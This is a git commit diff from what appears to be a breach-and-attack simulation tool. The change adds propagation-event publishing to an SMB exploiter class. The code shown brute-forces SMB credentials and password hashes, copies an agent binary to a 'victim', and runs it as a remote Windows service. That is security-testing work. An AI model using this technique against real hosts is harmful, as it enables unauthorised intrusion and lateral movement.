Agent: Publish propagation events

This commit is contained in:
Kekoa Kaaikala 2022-10-06 16:25:18 +00:00
parent c631755397
commit 7b13817b66
1 changed files with 11 additions and 7 deletions


@ -69,7 +69,7 @@ class SMBExploiter(HostExploiter):
def _exploit_host(self): def _exploit_host(self):
dest_path = get_agent_dst_path(self.host) dest_path = get_agent_dst_path(self.host)
remote_full_path, creds = self._exploit(dest_path) remote_full_path, creds, timestamp = self._exploit(dest_path)
if not self.exploit_result.exploitation_success: if not self.exploit_result.exploitation_success:
if self._is_interrupted(): if self._is_interrupted():
@ -93,7 +93,7 @@ class SMBExploiter(HostExploiter):
return self.exploit_result return self.exploit_result
self._run_agent_on_victim(scmr_rpc, cmdline) self._run_agent_on_victim(scmr_rpc, cmdline, timestamp)
logger.info( logger.info(
"Executed monkey '%s' on remote victim %r (cmdline=%r)", "Executed monkey '%s' on remote victim %r (cmdline=%r)",
@ -112,7 +112,7 @@ class SMBExploiter(HostExploiter):
) )
return self.exploit_result return self.exploit_result
def _exploit(self, dest_path: PurePath) -> Tuple[Optional[str], SelectedCredentials]: def _exploit(self, dest_path: PurePath) -> Tuple[Optional[str], SelectedCredentials, float]:
agent_binary = self.agent_binary_repository.get_agent_binary(self.host.os["type"]) agent_binary = self.agent_binary_repository.get_agent_binary(self.host.os["type"])
creds = generate_brute_force_combinations(self.options["credentials"]) creds = generate_brute_force_combinations(self.options["credentials"])
for user, password, lm_hash, ntlm_hash in interruptible_iter(creds, self.interrupt): for user, password, lm_hash, ntlm_hash in interruptible_iter(creds, self.interrupt):
@ -163,7 +163,7 @@ class SMBExploiter(HostExploiter):
self._publish_exploitation_event(timestamp, False, error_message=message) self._publish_exploitation_event(timestamp, False, error_message=message)
continue continue
return remote_full_path, SelectedCredentials(user, password, lm_hash, ntlm_hash) return remote_full_path, SelectedCredentials(user, password, lm_hash, ntlm_hash), timestamp
def _get_agent_command(self, remote_full_path: str, dest_path: PurePath) -> str: def _get_agent_command(self, remote_full_path: str, dest_path: PurePath) -> str:
if remote_full_path.lower() != str(dest_path).lower(): if remote_full_path.lower() != str(dest_path).lower():
@ -220,7 +220,7 @@ class SMBExploiter(HostExploiter):
return None return None
def _run_agent_on_victim(self, scmr_rpc: DCERPC_v5, cmdline: str): def _run_agent_on_victim(self, scmr_rpc: DCERPC_v5, cmdline: str, start_time: float):
scmr_rpc.bind(scmr.MSRPC_UUID_SCMR) scmr_rpc.bind(scmr.MSRPC_UUID_SCMR)
resp = scmr.hROpenSCManagerW(scmr_rpc) resp = scmr.hROpenSCManagerW(scmr_rpc)
sc_handle = resp["lpScHandle"] sc_handle = resp["lpScHandle"]
@ -239,15 +239,19 @@ class SMBExploiter(HostExploiter):
resp = scmr.hROpenServiceW(scmr_rpc, sc_handle, SMBExploiter.SMB_SERVICE_NAME) resp = scmr.hROpenServiceW(scmr_rpc, sc_handle, SMBExploiter.SMB_SERVICE_NAME)
else: else:
self.exploit_result.error_message = str(err) self.exploit_result.error_message = str(err)
return self.exploit_result self._publish_propagation_event(start_time, False, error_message=str(err))
return
service = resp["lpServiceHandle"] service = resp["lpServiceHandle"]
try: try:
scmr.hRStartServiceW(scmr_rpc, service) scmr.hRStartServiceW(scmr_rpc, service)
self._publish_propagation_event(start_time, True)
status = ScanStatus.USED status = ScanStatus.USED
except Exception: except Exception:
message = "Failed to start the service"
self._publish_propagation_event(start_time, False, error_message=message)
status = ScanStatus.SCANNED status = ScanStatus.SCANNED
pass
self.telemetry_messenger.send_telemetry(T1035Telem(status, UsageEnum.SMB)) self.telemetry_messenger.send_telemetry(T1035Telem(status, UsageEnum.SMB))
scmr.hRDeleteService(scmr_rpc, service) scmr.hRDeleteService(scmr_rpc, service)
scmr.hRCloseServiceHandle(scmr_rpc, service) scmr.hRCloseServiceHandle(scmr_rpc, service)